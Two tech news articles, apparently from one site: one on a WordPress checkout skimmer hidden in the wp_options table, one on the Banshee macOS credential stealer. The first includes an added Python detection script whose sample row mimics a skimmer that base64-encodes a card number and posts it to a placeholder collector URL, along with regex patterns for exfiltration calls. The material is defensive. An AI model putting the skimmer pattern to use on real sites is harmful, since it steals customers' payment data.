
Researchers Warn Of Stealthy Malware Stealing Payment Information From WordPress Sites
- Written by Kiara Fabbri Former Tech News Writer
- Fact-Checked by Justyn Newman Former Lead Cybersecurity Editor
Cybersecurity researchers at Sucuri are alerting website owners about a new type of cyberattack targeting WordPress e-commerce sites.
In a Rush? Here are the Quick Facts!
- Malware injects malicious JavaScript into WordPress database to steal payment details during checkout.
- It activates on checkout pages and captures data like credit card numbers and CVV codes.
- Stolen data is encrypted and sent to remote servers controlled by attackers.
This attack, known as a credit card skimmer campaign, is designed to secretly steal payment information from customers. The malware operates in the background, injecting malicious code into a WordPress website’s database and compromising checkout pages where customers enter their payment details.
The malware is particularly sneaky because it doesn’t rely on infecting theme files or plugins, which are typically scanned for malicious code. Instead, it hides inside the database, making it harder to detect.
Specifically, the malicious code is embedded in the “wp_options” table, a critical part of the WordPress setup, as noted by Sucuri. This allows it to avoid detection by common security tools and remain on infected sites undisturbed.
Once the malware is activated, it targets the checkout page, where users enter their credit card numbers, expiration dates, and CVV codes. The malicious code looks for the word “checkout” in the web address to ensure it only runs on the payment page, preventing it from being triggered on other parts of the site.
It either adds a fake payment form or hijacks the existing one, making it appear as if users are entering their details on a legitimate payment processor’s form, such as Stripe.
As customers input their credit card information, the malware captures it in real time. To make the stolen data harder to detect, the malware scrambles the information using encoding and encryption techniques, then sends it to remote servers controlled by the attacker.
This process is done quietly, so customers won’t notice anything unusual while completing their purchases. The stolen data is then sold on underground markets or used for fraudulent transactions, putting both customers and businesses at risk.
What makes this attack particularly dangerous is that it operates without disrupting the checkout process, so users are unaware their data is being stolen.
The researchers say that website owners can protect themselves by regularly checking for suspicious code in the WordPress admin panel, specifically under the “Widgets” section. They should look for unfamiliar JavaScript code that could indicate the presence of malware.
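The researchers’ advice above is to look for unfamiliar JavaScript under “Widgets”; widget content is stored as rows in the wp_options table, which is where this campaign hides. The following Python script is an added example (not Sucuri’s tooling and not part of the original article) that scans exported wp_options rows for the combination of behaviours the article describes: inline script, a “checkout” check on the URL, references to card fields, encoding calls and an outbound request. The indicator patterns, the reporting threshold and the sample rows are all constructed assumptions for illustration.

```python
# Added example (not Sucuri's tooling): flag wp_options rows that combine the
# behaviours of a database-resident checkout skimmer. Heuristics, threshold
# and sample rows are constructed for illustration.
import re
from dataclasses import dataclass, field

# Each pattern alone is common in legitimate code (payment plugins read card
# fields and call fetch); it is the combination that warrants a look.
INDICATORS = {
    "script_tag":    re.compile(r"<script\b", re.I),
    "checkout_gate": re.compile(r"(location\.(href|pathname)|document\.URL)[^\n;]{0,80}checkout", re.I),
    "card_fields":   re.compile(r"card[_-]?number|cvv|cvc|expir", re.I),
    "obfuscation":   re.compile(r"\b(atob|btoa|unescape|String\.fromCharCode)\s*\(", re.I),
    "exfil":         re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b", re.I),
}

# Minimum number of distinct indicators before a row is reported (assumption).
THRESHOLD = 3


@dataclass
class Finding:
    option_name: str
    hits: list = field(default_factory=list)


def scan_option(name: str, value: str) -> list:
    """Return the names of all indicators matching one option_value.
    Widget content is PHP-serialized inside option_value, but the markup
    survives serialization verbatim, so plain regexes work on the raw row."""
    return [key for key, rx in INDICATORS.items() if rx.search(value)]


def scan_rows(rows) -> list:
    """rows: iterable of (option_name, option_value) pairs, e.g. the result of
    SELECT option_name, option_value FROM wp_options. Reports rows whose
    distinct indicator count reaches THRESHOLD."""
    findings = []
    for name, value in rows:
        hits = scan_option(name, value)
        if len(hits) >= THRESHOLD:
            findings.append(Finding(name, hits))
    return findings


# Constructed sample rows (serialized lengths are illustrative). The third
# mimics the shape of an injected custom HTML widget; card_number_value and
# COLLECTOR_URL are deliberately undefined placeholders, not working code.
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    ("widget_custom_html",
     'a:1:{i:2;a:2:{s:5:"title";s:0:"";s:7:"content";'
     's:31:"<script>console.log(1)</script>";}}'),
    ("widget_block",
     'a:1:{i:3;a:1:{s:7:"content";s:0:"<!-- wp:html --><script>'
     'if (location.href.indexOf("checkout") > -1) {'
     ' var d = btoa(card_number_value); fetch(COLLECTOR_URL, {method: "POST", body: d}); }'
     '</script><!-- /wp:html -->";}}'),
]


if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(f"{finding.option_name}: {', '.join(finding.hits)}")
```

Feed it the rows from a database export (`SELECT option_name, option_value FROM wp_options`) and treat every reported row as a triage lead rather than a verdict: compare the flagged value against a known-good backup, and expect legitimate checkout plugins to trip one or two indicators on their own.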

Banshee Malware Targets MacOS Users With New Stealth Features
- Written by Kiara Fabbri Former Tech News Writer
- Fact-Checked by Justyn Newman Former Lead Cybersecurity Editor
Check Point Research (CPR) has been tracking a dangerous version of Banshee, a malware targeting macOS users since September 2024.
In a Rush? Here are the Quick Facts!
- Banshee Stealer targets macOS, stealing browser credentials and cryptocurrency wallet data.
- The malware evades detection using Apple’s XProtect encryption in its latest version.
- Banshee spreads via phishing websites and fake GitHub repositories impersonating popular software.
Banshee is capable of stealing sensitive information such as browser credentials, cryptocurrency wallet data, and passwords, as reported in the new analysis by CPR.
According to the researchers, the malware has managed to remain undetected for over two months, thanks to a modification of Apple’s XProtect encryption, which prevents antivirus systems from identifying it.
Banshee is typically distributed through phishing websites and fake GitHub repositories, often posing as popular software like Chrome, Telegram, or TradingView. Once installed, Banshee silently runs in the background, stealing data from browsers like Chrome, Brave, and Edge.
It also targets cryptocurrency wallet extensions and Two-Factor Authentication (2FA) credentials, sending the stolen information to remote servers, as reported by CPR.
The researchers say that a significant change in the latest version of Banshee is the removal of a feature that previously halted its operations if the Russian language was detected. This update broadens the malware’s potential victim pool, indicating an expansion of its global reach.
Despite the leak of Banshee’s source code in November 2024, which helped antivirus systems detect the malware more effectively, phishing campaigns continue to distribute it. This leak also raises concerns that other cybercriminals may develop new variants of Banshee, says CPR.
With macOS devices now used by over 100 million people worldwide, the Banshee Stealer campaign emphasizes the increasing risks to macOS users. “This new Banshee Stealer variant exposes a critical gap in Mac security,” said Ms. Ngoc Bui, a cybersecurity expert at Menlo Security, as reported by Forbes.
“While companies are increasingly adopting Apple ecosystems, the security tools haven’t kept pace. We need a multi-layered approach to security, including more trained hunters on Mac environments,” Bui added.
Privileged access management, once considered a nice-to-have feature, has now become a cornerstone of modern cybersecurity for business users. The Banshee Stealer threat underscores the urgency of this shift.
“By restricting access and ensuring that elevated permissions are granted only when necessary,” Scobey explained, “privileged access management significantly reduces the attack surface for threats like Banshee,” as reported by Forbes.
When combined with endpoint protection and robust password management, privileged access management offers a powerful defense against such exploits.
“The time has come for businesses to shift from reactive to proactive security strategies,” Scobey emphasized, as reported by Forbes. He concluded, “Malware like Banshee thrives on gaps in vigilance and access controls. By prioritizing advanced tools, user education, and layered defenses, organizations can stay ahead in the race against evolving cyber threats.”
The malware’s sophistication proves that even operating systems traditionally seen as secure, like macOS, are vulnerable to targeted cyberattacks. Both businesses and individuals must be vigilant and adopt advanced cybersecurity measures to protect against evolving threats like Banshee.